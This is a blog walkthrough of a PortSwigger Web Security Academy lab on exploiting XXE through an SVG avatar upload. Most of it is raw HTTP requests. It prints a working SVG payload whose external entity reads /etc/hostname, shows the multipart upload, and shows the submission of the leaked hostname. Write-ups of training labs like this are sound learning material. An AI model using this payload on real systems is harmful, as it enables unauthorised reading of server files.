Skip to content

chojnowski.it

Port Swigger Exploiting XXE via image file upload

Port Swigger Exploiting XXE via image file upload

Exploiting XXE via image file upload¶

Solution¶

Open post¶

GET /post?postId=5 HTTP/2
Host: 0af300dc04515e8d80a0e9d900f30005.web-security-academy.net
Cookie: session=ipdoKrPEFfP8WfPgnwdnVNFHlZ1qcZwg
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0af300dc04515e8d80a0e9d900f30005.web-security-academy.net/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

Sent request with payload¶

Payload:
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
   <text font-size="16" x="0" y="16">&xxe;</text>
</svg>
---
Request
POST /post/comment HTTP/2
Host: 0af300dc04515e8d80a0e9d900f30005.web-security-academy.net
Cookie: session=ipdoKrPEFfP8WfPgnwdnVNFHlZ1qcZwg
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------203983310142011218401884526176
Content-Length: 1261
Origin: https://0af300dc04515e8d80a0e9d900f30005.web-security-academy.net
Referer: https://0af300dc04515e8d80a0e9d900f30005.web-security-academy.net/post?postId=5
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

-----------------------------203983310142011218401884526176
Content-Disposition: form-data; name="csrf"

bfFPqi334Ho3h9007GauAMxL1chlY71J
-----------------------------203983310142011218401884526176
Content-Disposition: form-data; name="postId"

5
-----------------------------203983310142011218401884526176
Content-Disposition: form-data; name="comment"

test
-----------------------------203983310142011218401884526176
Content-Disposition: form-data; name="name"

pentester
-----------------------------203983310142011218401884526176
Content-Disposition: form-data; name="avatar"; filename="file.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
   <text font-size="16" x="0" y="16">&xxe;</text>
</svg>

-----------------------------203983310142011218401884526176
Content-Disposition: form-data; name="email"

[email protected]
-----------------------------203983310142011218401884526176
Content-Disposition: form-data; name="website"

http://localhost.pl
-----------------------------203983310142011218401884526176--

Read hostname from image¶

View source: https://0af300dc04515e8d80a0e9d900f30005.web-security-academy.net/post?postId=5 (line 101)
<img src="/post/comment/avatars?filename=1.png" class="avatar">                            <a id="author" href="http://localhost.pl">pentester</a> | 14 January 2026

---
Open website: https://0af300dc04515e8d80a0e9d900f30005.web-security-academy.net/post/comment/avatars?filename=1.png

GET /post/comment/avatars?filename=1.png HTTP/1.1
Host: 0af300dc04515e8d80a0e9d900f30005.web-security-academy.net
Cookie: session=ipdoKrPEFfP8WfPgnwdnVNFHlZ1qcZwg
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Connection: keep-alive

Submit solution¶

Hostname: 5f65ea1bc8b3
---
Request
POST /submitSolution HTTP/2
Host: 0af300dc04515e8d80a0e9d900f30005.web-security-academy.net
Cookie: session=ipdoKrPEFfP8WfPgnwdnVNFHlZ1qcZwg
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 19
Origin: https://0af300dc04515e8d80a0e9d900f30005.web-security-academy.net
Referer: https://0af300dc04515e8d80a0e9d900f30005.web-security-academy.net/post?postId=5
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

answer=5f65ea1bc8b3

Solved¶